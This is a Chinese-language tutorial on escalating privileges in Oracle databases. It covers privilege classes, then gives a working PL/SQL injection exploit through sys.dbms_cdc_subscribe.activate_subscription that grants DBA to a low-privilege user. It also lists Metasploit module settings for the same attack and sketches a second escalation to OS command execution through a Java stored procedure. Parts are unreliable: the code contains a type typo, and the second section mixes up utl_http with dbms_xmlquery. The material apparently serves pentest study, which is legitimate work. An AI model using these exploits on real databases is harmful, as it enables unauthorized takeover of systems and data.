0x00 Oracle提权基础
1、Oracle权限分配
1.1 系统权限
系统规定用户使用数据库的权限。(系统权限是对用户而言)。
系统权限分类
DBA: 拥有全部特权,是系统最高权限,只有DBA才可以创建数据库结构。
RESOURCE:拥有Resource权限的用户只可以创建实体,不可以创建数据库结构。
CONNECT:拥有Connect权限的用户只可以登录Oracle,不可以创建实体,不可以创建数据库结构。
对于普通用户:授予connect, resource权限。
对于DBA管理用户:授予connect,resource, dba权限。
1.2 实体权限
某种权限用户对其它用户的表或视图的存取权限。(是针对表或视图而言的)。
实体权限分类
select, update, insert, alter, index, delete, all //all包括所有权限
execute //执行存储过程权限
0x01 Oracle提权方法
1、通过注入存储过程提权(低权限提升至DBA)
1.1 原理
SYS创建的存储过程存在sql注入。拥有create procedure权限的用户通过创建提权函数,将提权函数注入到存储过程中,于是该存储过程将调用这个提权函数来执行grant dba to quan命令,获得Oracle数据库dba权限。
1.2 利用条件
1、SYS创建的存储过程存在sql注入(EG:CVE-2005-4832)
2、用户拥有create procedure权限(用来创建函数)
1.3 提权步骤
假设有一个用户quan 只有 CONNECT 和 RESOURCE 权限
1.3.1 手工注入
(1)用户登陆后执行select * from session_privs查看权限
(2)创建函数,命令为grant dba to quan
grant execute on pwn to public;//赋予所有用户此函数的执行权限
SQL>create or replace function pwn return vaarchar2
authid current_user is pragma autonomous_transaction;
begin
execute immediate 'grant dba to quan';
return '';
end;
/
SQL>grant execute on pwn to public;
/
(3)注入sys.dbms_cdc_subscribe.activate_subscription
SQL>begin
sys.dbms_cdc_subscribe.activate_subscription('''||quan.pwn()||''');
end;
/
SQL>set role dba;
(4)执行select * from session_privs查看是否为dba权限
1.3.2 利用MSF注入
(1)加载攻击模块
use auxiliary/sqli/oracle/dbms_cdc_subscribe.activate_subscription
(2)配置参数
set dbuser quan
set dbpass quan123
set sid orcl
set rhost xxxxx
set sql grant dba to quan
(3)run
2、通过utl_http.request存储过程提权
2.1 原理
Oracle9i~11gR2中dbms_xmlquery.newcontext()和dbms_xmlquery.getxml()函数可以执行任意PL/SQL语句,利用这两个函数可以获得Oracle服务器的操作系统权限。
2.2 利用条件
1、UTL_HTTP存储过程可用
2、Oracle9i~11gR2
2.3 提权步骤
(1)创建Java包
(2)创建存储过程MYJAVACMD
(3)执行存储过程,成功添加用户
0x02 参考文章
《网络攻防实战研究——漏洞利用与提权》